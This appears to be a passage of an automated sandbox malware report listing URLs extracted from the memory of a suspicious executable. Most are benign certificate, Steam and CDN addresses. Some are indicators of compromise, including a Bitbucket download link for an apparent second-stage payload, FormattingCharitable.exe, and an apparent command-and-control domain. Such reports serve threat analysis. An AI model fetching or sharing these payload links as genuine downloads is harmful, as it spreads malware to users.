Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aspecteirs.lat/
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/f
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000002.1976145039.00000000012FB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe3
Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/z
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: jSFUzuYPG9.exe	String found in binary or memory: https://community.fastly.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRt
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.71
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l==
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
